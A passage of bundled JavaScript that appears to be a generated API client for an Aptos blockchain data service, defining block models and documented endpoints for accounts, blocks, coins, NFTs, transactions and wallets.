        if (value instanceof $a7ef34a427d74c9c$export$742231df2dac82cf) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$ea17bcd935bcab90) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$235cc53255f74f73) return value.toJSON();
        throw new Error("Cannot resolve union from AptosBlockTransactionsItemValue");
    };
    return AptosBlockTransactionsItem;
}();
var $a7ef34a427d74c9c$export$3bce5a201958ed8 = /** @class */ function() {
    function AptosBlock(input) {
        this.blockHeight = input.blockHeight;
        this.blockHash = input.blockHash;
        this.blockTimestamp = input.blockTimestamp;
        this.firstVersion = input.firstVersion;
        this.lastVersion = input.lastVersion;
        this.transactions = input.transactions ? input.transactions.map(function(item) {
            return $a7ef34a427d74c9c$export$3e4489f98b7822c3.create(item);
        }) : undefined;
    }
    AptosBlock.create = function(input) {
        if (input instanceof AptosBlock) return input;
        return new AptosBlock(input);
    };
    AptosBlock.fromJSON = function(json) {
        var input = {
            blockHeight: json.block_height,
            blockHash: json.block_hash,
            blockTimestamp: json.block_timestamp,
            firstVersion: json.first_version,
            lastVersion: json.last_version,
            transactions: json.transactions ? json.transactions.map(function(item) {
                return $a7ef34a427d74c9c$export$3e4489f98b7822c3.fromJSON(item);
            }) : undefined
        };
        return AptosBlock.create(input);
    };
    AptosBlock.prototype.toJSON = function() {
        return {
            block_height: this.blockHeight,
            block_hash: this.blockHash,
            block_timestamp: this.blockTimestamp,
            first_version: this.firstVersion,
            last_version: this.lastVersion,
            transactions: this.transactions ? this.transactions.map(function(item) {
                return $a7ef34a427d74c9c$export$3e4489f98b7822c3.toJSON(item);
            }) : undefined
        };
    };
    return AptosBlock;
}();
var $a7ef34a427d74c9c$export$d4c56134106f58d1 = {
    operationId: "getBlockByHeight",
    groupName: "blocks",
    httpMethod: "get",
    routePattern: "/blocks/{block_height}",
    parameterNames: [
        "block_height",
        "with_transactions",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$3bce5a201958ed8.fromJSON(json);
    },
    serializeRequest: function(request) {
        var blockHeight = request.blockHeight;
        var withTransactions = request.withTransactions;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            block_height: blockHeight,
            with_transactions: withTransactions,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$5f7dbec1675cde76 = {
    operationId: "getBlockByVersion",
    groupName: "blocks",
    httpMethod: "get",
    routePattern: "/blocks/by_version/{version}",
    parameterNames: [
        "version",
        "with_transactions",
        "network"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $a7ef34a427d74c9c$export$3bce5a201958ed8.fromJSON(json);
    },
    serializeRequest: function(request) {
        var version = request.version;
        var withTransactions = request.withTransactions;
        var network = request.network ? $a7ef34a427d74c9c$export$5f4e060315c73a8.create(request.network) : undefined;
        return {
            version: version,
            with_transactions: withTransactions,
            network: network ? network.toJSON() : undefined
        };
    }
};
var $a7ef34a427d74c9c$export$1cab9424f7b9d36c = /** @class */ function() {
    function AbstractClient() {
        this.accounts = {
            /**
             * @description Get account
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} [request.ledgerVersion] Ledger version to get state of account.
             * If not provided, it will be the latest version (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getAccount: this.createEndpoint($a7ef34a427d74c9c$export$944ab138a16c620e),
            /**
             * @description Get account resources
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} [request.ledgerVersion] Ledger version to get state of account.
             * If not provided, it will be the latest version (optional)
             * @param {Number} [request.limit] Max number of account resources to retrieve.
             * If not provided, defaults to default page size. (optional)
             * @param {String} [request.start] Cursor specifying where to start for pagination
             * This cursor cannot be derived manually client-side. Instead, you must call this endpoint once without this query parameter specified, and then use the cursor returned in the X-Aptos-Cursor header in the response. (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getAccountResources: this.createEndpoint($a7ef34a427d74c9c$export$2436dd23bd0aa97c),
            /**
             * @description Get account modules
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} [request.ledgerVersion] Ledger version to get state of account.
             * If not provided, it will be the latest version (optional)
             * @param {Number} [request.limit] Max number of account resources to retrieve.
             * If not provided, defaults to default page size. (optional)
             * @param {String} [request.start] Cursor specifying where to start for pagination
             * This cursor cannot be derived manually client-side. Instead, you must call this endpoint once without this query parameter specified, and then use the cursor returned in the X-Aptos-Cursor header in the response. (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getAccountModules: this.createEndpoint($a7ef34a427d74c9c$export$d2d2cd6e70dfe394),
            /**
             * @description Get account resource
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} request.resourceType Name of struct to retrieve e.g. 0x1::account::Account
             * @param {String} [request.ledgerVersion] Ledger version to get state of account.
             * If not provided, it will be the latest version (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getAccountResource: this.createEndpoint($a7ef34a427d74c9c$export$9727ea9b7f41a19),
            /**
             * @description Get account module
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} request.moduleName Name of module to retrieve
             * @param {String} [request.ledgerVersion] Ledger version to get state of account.
             * If not provided, it will be the latest version (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getAccountModule: this.createEndpoint($a7ef34a427d74c9c$export$7fe2a082bcb32be2),
            /**
             * @description Get events by creation number
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {String} request.creationNumber Creation number corresponding to the event stream originating from the given account.
             * @param {Number} [request.limit] Max number of account resources to retrieve.
             * If not provided, defaults to default page size. (optional)
             * @param {String} [request.start] Starting sequence number of events.
             * If unspecified, by default will retrieve the most recent events (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getEventsByCreationNumber: this.createEndpoint($a7ef34a427d74c9c$export$5af241b06a37f277),
            /**
             * @description Get events by event handle
             * @param request Request with parameters.
             * @param {String} request.address Hex-encoded 32 byte Aptos account, with or without a 0x prefix, for which events are queried. This refers to the account that events were emitted to, not the account hosting the move module that emits that event type.
             * @param {String} request.eventHandle Name of struct to lookup event handle.
             * @param {String} request.fieldName Name of field to lookup event handle.
             * @param {Number} [request.limit] Max number of account resources to retrieve.
             * If not provided, defaults to default page size. (optional)
             * @param {String} [request.start] Starting sequence number of events.
             * If unspecified, by default will retrieve the most recent events (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getEventsByEventHandle: this.createEndpoint($a7ef34a427d74c9c$export$50d5ae96d62a00f7)
        };
        this.blocks = {
            /**
             * @description Get block by height
             * @param request Request with parameters.
             * @param {Number} request.blockHeight Block height to lookup. Starts at 0
             * @param {Boolean} [request.withTransactions] If set to true, include all transactions in the block (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getBlockByHeight: this.createEndpoint($a7ef34a427d74c9c$export$d4c56134106f58d1),
            /**
             * @description Get block by version
             * @param request Request with parameters.
             * @param {Number} request.version Ledger version to lookup block information for.
             * @param {Boolean} [request.withTransactions] If set to true, include all transactions in the block (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getBlockByVersion: this.createEndpoint($a7ef34a427d74c9c$export$5f7dbec1675cde76)
        };
        this.coins = {
            /**
             * @description Get Coin Metadata by Coin Type Hashes
             * @param request Request with parameters.
             * @param {String[]} request.coinTypeHashes The coin type hashes to fetch info about
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getCoinInfoByCoinTypeHashes: this.createEndpoint($a7ef34a427d74c9c$export$e1f2715da49946f0),
            /**
             * @description Get latest deployed coins
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getLatestCoins: this.createEndpoint($a7ef34a427d74c9c$export$2c6abf653e9049d6),
            /**
             * @description Get Coin Metadata by name range
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromName] The name of the coin to start from (inclusive and case sensitive) (optional)
             * @param {String} [request.toName] The name of the coin to end at (inclusive and case sensitive) (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinsByNameRange: this.createEndpoint($a7ef34a427d74c9c$export$a9e1213231c21cda),
            /**
             * @description Get Coin Metadata by symbol range
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromSymbol] The name of the coin to start from (inclusive and case sensitive) (optional)
             * @param {String} [request.toSymbol] The name of the coin to end at (inclusive and case sensitive) (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinsBySymbolRange: this.createEndpoint($a7ef34a427d74c9c$export$ed43b8b43ddbe7cf),
            /**
             * @description Get Coin Metadata by creator addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.creatorAddresses The addresses of the creators
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinsByCreators: this.createEndpoint($a7ef34a427d74c9c$export$c2b74bb10dd7c6f4),
            /**
             * @description Get Coin Transfers by wallet addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.ownerAddresses The addresses of the owners to get tokens for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromDate] The date from which to fetch coin transfers (optional)
             * @param {String} [request.toDate] The date to which to fetch coin transfers (optional)
             * @param {String[]} [request.coinTypeBlacklist] The coin types of the coins to whitelist (optional)
             * @param {String[]} [request.coinTypeWhitelist] The coin types of the coins to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinTransfersByOwnerAddresses: this.createEndpoint($a7ef34a427d74c9c$export$443828fb54ec6c26),
            /**
             * @description Get Coin Transfers by block heights
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {String[]} request.blockHeights The coin types to fetch info about
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinTransfersByBlockHeights: this.createEndpoint($a7ef34a427d74c9c$export$56510a7d4739a5ff),
            /**
             * @description Get Coin Transfers by Coin Type
             * @param request Request with parameters.
             * @param {String} request.coinType The coin type to fetch info about
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromDate] The date from which to fetch coin transfers (optional)
             * @param {String} [request.toDate] The date to which to fetch coin transfers (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinTransfersByCoinType: this.createEndpoint($a7ef34a427d74c9c$export$36701cf3f4ccabb9),
            /**
             * @description Get top Holders of Coin
             * @param request Request with parameters.
             * @param {String} request.coinTypeHash The coin type hash to fetch info about
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.minAmount] The minimum amount of coins required for a wallet to be included in the results (optional)
             * @param {Number} [request.minVersion] The minimum version on when the balance was last updated (optional)
             * @param {String[]} [request.walletBlacklist] The addresses of the wallets to blacklist (optional)
             * @param {String[]} [request.walletWhitelist] The addresses of the wallets to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getTopHoldersByCoin: this.createEndpoint($a7ef34a427d74c9c$export$d1e56e567de73190)
        };
        this.collections = {
            /**
             * @description Get NFT Collections
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromName] The name of the collection to start from (inclusive and case sensitive) (optional)
             * @param {String} [request.toName] The name of the collection to end at (inclusive and case sensitive) (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTCollections: this.createEndpoint($a7ef34a427d74c9c$export$4b98c6b703579a61),
            /**
             * @description Get NFT Collections by ids
             * @param request Request with parameters.
             * @param {String[]} request.ids The identifiers of the collections to get
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getNFTCollectionsByIds: this.createEndpoint($a7ef34a427d74c9c$export$acedd0d733b6235a),
            /**
             * @description Get NFT Collections by creator
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object} request.creatorAddress The address of the creator
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTCollectionsByCreator: this.createEndpoint($a7ef34a427d74c9c$export$da67b0ebe232b248)
        };
        this.nfts = {
            /**
             * @description Get NFTs by ids
             * @param request Request with parameters.
             * @param {String[]} request.tokenIds The identifiers of the tokens to get
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getNFTsByIds: this.createEndpoint($a7ef34a427d74c9c$export$63fa3712925836c2),
            /**
             * @description Get NFTs by Collection
             * @param request Request with parameters.
             * @param {String} request.collectionDataIdHash The collection data id hash of the collection
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTsByCollection: this.createEndpoint($a7ef34a427d74c9c$export$e424a727202aabe6),
            /**
             * @description Get NFTs by creators
             * @param request Request with parameters.
             * @param {Number} request.limit The number of tokens to return
             * @param {Object[]} request.creatorAddresses The addresses of the creators
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTsByCreators: this.createEndpoint($a7ef34a427d74c9c$export$9b8c2b9e2ea283c8),
            /**
             * @description Get NFT Owners by tokens
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {String[]} request.tokenIds The identifiers of the tokens to get owners for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTOwnersByTokens: this.createEndpoint($a7ef34a427d74c9c$export$3cb895384c3bd42b),
            /**
             * @description Get NFT Owners by Collection
             * @param request Request with parameters.
             * @param {String} request.collectionDataIdHash The id of the token
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.walletBlacklist] The addresses of the wallets to blacklist (optional)
             * @param {String[]} [request.walletWhitelist] The addresses of the wallets to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTOwnersByCollection: this.createEndpoint($a7ef34a427d74c9c$export$4f5fa3639a779107),
            /**
             * @description Get NFT Owners of Collection
             * @param request Request with parameters.
             * @param {String} request.collectionDataIdHash The id of the token
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTOwnersOfCollection: this.createEndpoint($a7ef34a427d74c9c$export$2b94b753bdbdd0bb),
            /**
             * @description Get NFT Transfers by Token ids
             * @param request Request with parameters.
             * @param {Number} request.limit The number of tokens to return
             * @param {String[]} request.tokenIds The identifiers of the tokens to get
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.walletBlacklist] The addresses of the wallets to blacklist (optional)
             * @param {String[]} [request.walletWhitelist] The addresses of the wallets to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTTransfersByIds: this.createEndpoint($a7ef34a427d74c9c$export$f80e60f41cfc5785),
            /**
             * @description Get NFT Transfers by Collection
             * @param request Request with parameters.
             * @param {String} request.collectionDataIdHash The collection data id hash of the token
             * @param {Number} request.limit The number of results to return
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.walletWhitelist] The addresses of the wallets to whitelist (optional)
             * @param {String[]} [request.walletBlacklist] The addresses of the wallets to blacklist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTTransfersByCollection: this.createEndpoint($a7ef34a427d74c9c$export$5bdca0d2dcb271ad),
            /**
             * @description Get NFT Transfers by creators
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.creatorAddresses The addresses of the creators
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.collectionBlacklist] The ids of the collections to whitelist (optional)
             * @param {String[]} [request.collectionWhitelist] The ids of the collections to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTTransfersByCreators: this.createEndpoint($a7ef34a427d74c9c$export$1d2aea779a3c39c5),
            /**
             * @description Get NFT Transfers by wallets
             * @param request Request with parameters.
             * @param {Number} request.limit The number of tokens to return
             * @param {Object[]} request.walletAddresses The addresses of the wallets to get transfers for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.collectionBlacklist] The ids of the collections to whitelist (optional)
             * @param {String[]} [request.collectionWhitelist] The ids of the collections to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTTransfersByWallets: this.createEndpoint($a7ef34a427d74c9c$export$b76b3fbad5070842)
        };
        this.transactions = {
            /**
             * @description Get transactions
             * @param request Request with parameters.
             * @param {Number} [request.limit] Max number of transactions to retrieve.
             * If not provided, defaults to default page size (optional)
             * @param {String} [request.start] Account sequence number to start list of transactions.
             * If not provided, defaults to showing the latest transactions (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getTransactions: this.createEndpoint($a7ef34a427d74c9c$export$5228de05397d21fd),
            /**
             * @description Submit transaction
             * @param request Request with parameters.
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @param body Request body.
             * @param {Object} body.sender A hex encoded 32 byte Aptos account address.
             * @param {String} body.sequenceNumber A string containing a 64-bit unsigned integer.
             * @param {String} body.maxGasAmount A string containing a 64-bit unsigned integer.
             * @param {String} body.gasUnitPrice A string containing a 64-bit unsigned integer.
             * @param {String} body.expirationTimestampSecs A string containing a 64-bit unsigned integer.
             * @param {Object} body.payload An enum of the possible transaction payloads
             * @param {Object} body.signature
             * @returns {Object} Response for the request.
             */ submitTransaction: this.createEndpointWithBody($a7ef34a427d74c9c$export$7cbbaa09450d3249),
            /**
             * @description Get transaction by hash
             * @param request Request with parameters.
             * @param {String} request.txnHash Hash of transaction to retrieve
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getTransactionByHash: this.createEndpoint($a7ef34a427d74c9c$export$bb470345de966f4c),
            /**
             * @description Get transaction by version
             * @param request Request with parameters.
             * @param {String} request.txnVersion Version of transaction to retrieve
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getTransactionByVersion: this.createEndpoint($a7ef34a427d74c9c$export$79a305cfb9e127fc),
            /**
             * @description Get account transactions
             * @param request Request with parameters.
             * @param {String} request.address Address of account with or without a 0x prefix
             * @param {Number} [request.limit] Max number of transactions to retrieve.
             * If not provided, defaults to default page size (optional)
             * @param {String} [request.start] Account sequence number to start list of transactions.
             * If not provided, defaults to showing the latest transactions (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object[]} Response for the request.
             */ getAccountTransactions: this.createEndpoint($a7ef34a427d74c9c$export$5688f6f0c2eb36b3),
            /**
             * @description Submit batch transactions
             * @param request Request with parameters.
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @param body Request body.
             * @param {Object} body.sender A hex encoded 32 byte Aptos account address.
             * @param {String} body.sequenceNumber A string containing a 64-bit unsigned integer.
             * @param {String} body.maxGasAmount A string containing a 64-bit unsigned integer.
             * @param {String} body.gasUnitPrice A string containing a 64-bit unsigned integer.
             * @param {String} body.expirationTimestampSecs A string containing a 64-bit unsigned integer.
             * @param {Object} body.payload An enum of the possible transaction payloads
             * @param {Object} body.signature
             * @returns {Object} Response for the request.
             */ submitBatchTransactions: this.createEndpointWithBody($a7ef34a427d74c9c$export$999cf8764bf9bbd6),
            /**
             * @description Simulate transaction
             * @param request Request with parameters.
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @param body Request body.
             * @param {Object} body.sender A hex encoded 32 byte Aptos account address.
             * @param {String} body.sequenceNumber A string containing a 64-bit unsigned integer.
             * @param {String} body.maxGasAmount A string containing a 64-bit unsigned integer.
             * @param {String} body.gasUnitPrice A string containing a 64-bit unsigned integer.
             * @param {String} body.expirationTimestampSecs A string containing a 64-bit unsigned integer.
             * @param {Object} body.payload An enum of the possible transaction payloads
             * @param {Object} body.signature
             * @returns {Object} Response for the request.
             */ simulateTransaction: this.createEndpointWithBody($a7ef34a427d74c9c$export$ba054f595f737627),
            /**
             * @description Encode submission
             * @param request Request with parameters.
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @param body Request body.
             * @param {Object} body.sender A hex encoded 32 byte Aptos account address.
             * @param {String} body.sequenceNumber A string containing a 64-bit unsigned integer.
             * @param {String} body.maxGasAmount A string containing a 64-bit unsigned integer.
             * @param {String} body.gasUnitPrice A string containing a 64-bit unsigned integer.
             * @param {String} body.expirationTimestampSecs A string containing a 64-bit unsigned integer.
             * @param {Object} body.payload An enum of the possible transaction payloads
             * @param {String[]} body.secondarySigners Secondary signer accounts of the request for Multi-agent
             * @returns {String} Response for the request.
             */ encodeSubmission: this.createEndpointWithBody($a7ef34a427d74c9c$export$fd2a501ff1129ef7),
            /**
             * @description Estimate gas price
             * @param request Request with parameters.
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ estimateGasPrice: this.createEndpoint($a7ef34a427d74c9c$export$3adaf9223d82a615)
        };
        this.wallets = {
            /**
             * @description Get Coin Balances by wallet addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.ownerAddresses The addresses of the owners to get coin balances for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.coinTypeHashBlacklist] The coin type hashes of the coins to whitelist (optional)
             * @param {String[]} [request.coinTypeHashWhitelist] The coin type hashes of the coins to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinBalancesByWallets: this.createEndpoint($a7ef34a427d74c9c$export$7be1004cc0937d8b),
            /**
             * @description Get Historical Coin Balances by wallet addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.ownerAddresses The addresses of the owner addresses to get historical balances for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.coinTypeHashBlacklist] The coin type hash of the coins to whitelist (optional)
             * @param {String[]} [request.coinTypeHashWhitelist] The coin type hash of the coins to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getHistoricalCoinBalancesByWallets: this.createEndpoint($a7ef34a427d74c9c$export$7b929e860376a92f),
            /**
             * @description Get Coin Transfers by wallet addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.ownerAddresses The addresses of the owners to get tokens for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String} [request.fromDate] The date from which to fetch coin transfers (optional)
             * @param {String} [request.toDate] The date to which to fetch coin transfers (optional)
             * @param {String[]} [request.coinTypeBlacklist] The coin types of the coins to whitelist (optional)
             * @param {String[]} [request.coinTypeWhitelist] The coin types of the coins to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getCoinTransfersByWalletAddresses: this.createEndpoint($a7ef34a427d74c9c$export$c8696df2bb89968),
            /**
             * @description Get NFTs by wallet addresses
             * @param request Request with parameters.
             * @param {Number} request.limit The number of results to return
             * @param {Object[]} request.ownerAddresses The addresses of the owners to get tokens for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.collectionBlacklist] The collection data id hashes of the collections to whitelist (optional)
             * @param {String[]} [request.collectionWhitelist] The collection data id hashes of the collections to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getNFTByOwners: this.createEndpoint($a7ef34a427d74c9c$export$ad93948450dc00f2),
            /**
             * @description Get NFT Transfers by wallets
             * @param request Request with parameters.
             * @param {Number} request.limit The number of tokens to return
             * @param {Object[]} request.walletAddresses The addresses of the wallets to get transfers for
             * @param {Number} [request.offset] The number of results to skip (optional)
             * @param {String} [request.cursor] The cursor to use for getting the next page (optional)
             * @param {String[]} [request.collectionBlacklist] The ids of the collections to whitelist (optional)
             * @param {String[]} [request.collectionWhitelist] The ids of the collections to whitelist (optional)
             * @param {Object} [request.network] The network of query. Defaults to mainnet. (optional)
             * @returns {Object} Response for the request.
             */ getWalletsNFTTransfers: this.createEndpoint($a7ef34a427d74c9c$export$ad0a47efda62f79d)
        };
    }
    return AbstractClient;
}();
var $a7ef34a427d74c9c$export$59894c102379d64a = [
    $a7ef34a427d74c9c$export$63fa3712925836c2,
    $a7ef34a427d74c9c$export$e424a727202aabe6,
    $a7ef34a427d74c9c$export$9b8c2b9e2ea283c8,
    $a7ef34a427d74c9c$export$4b98c6b703579a61,
    $a7ef34a427d74c9c$export$acedd0d733b6235a,
    $a7ef34a427d74c9c$export$da67b0ebe232b248,
    $a7ef34a427d74c9c$export$3cb895384c3bd42b,
    $a7ef34a427d74c9c$export$4f5fa3639a779107,
    $a7ef34a427d74c9c$export$2b94b753bdbdd0bb,
    $a7ef34a427d74c9c$export$f80e60f41cfc5785,
    $a7ef34a427d74c9c$export$5bdca0d2dcb271ad,
    $a7ef34a427d74c9c$export$1d2aea779a3c39c5,
    $a7ef34a427d74c9c$export$b76b3fbad5070842,
    $a7ef34a427d74c9c$export$e1f2715da49946f0,
    $a7ef34a427d74c9c$export$2c6abf653e9049d6,
    $a7ef34a427d74c9c$export$a9e1213231c21cda,
    $a7ef34a427d74c9c$export$ed43b8b43ddbe7cf,
    $a7ef34a427d74c9c$export$c2b74bb10dd7c6f4,
    $a7ef34a427d74c9c$export$443828fb54ec6c26,
    $a7ef34a427d74c9c$export$56510a7d4739a5ff,
    $a7ef34a427d74c9c$export$36701cf3f4ccabb9,
    $a7ef34a427d74c9c$export$d1e56e567de73190,
    $a7ef34a427d74c9c$export$7be1004cc0937d8b,
    $a7ef34a427d74c9c$export$7b929e860376a92f,
    $a7ef34a427d74c9c$export$c8696df2bb89968,
    $a7ef34a427d74c9c$export$ad93948450dc00f2,
    $a7ef34a427d74c9c$export$ad0a47efda62f79d,
    $a7ef34a427d74c9c$export$944ab138a16c620e,
    $a7ef34a427d74c9c$export$2436dd23bd0aa97c,
    $a7ef34a427d74c9c$export$d2d2cd6e70dfe394,
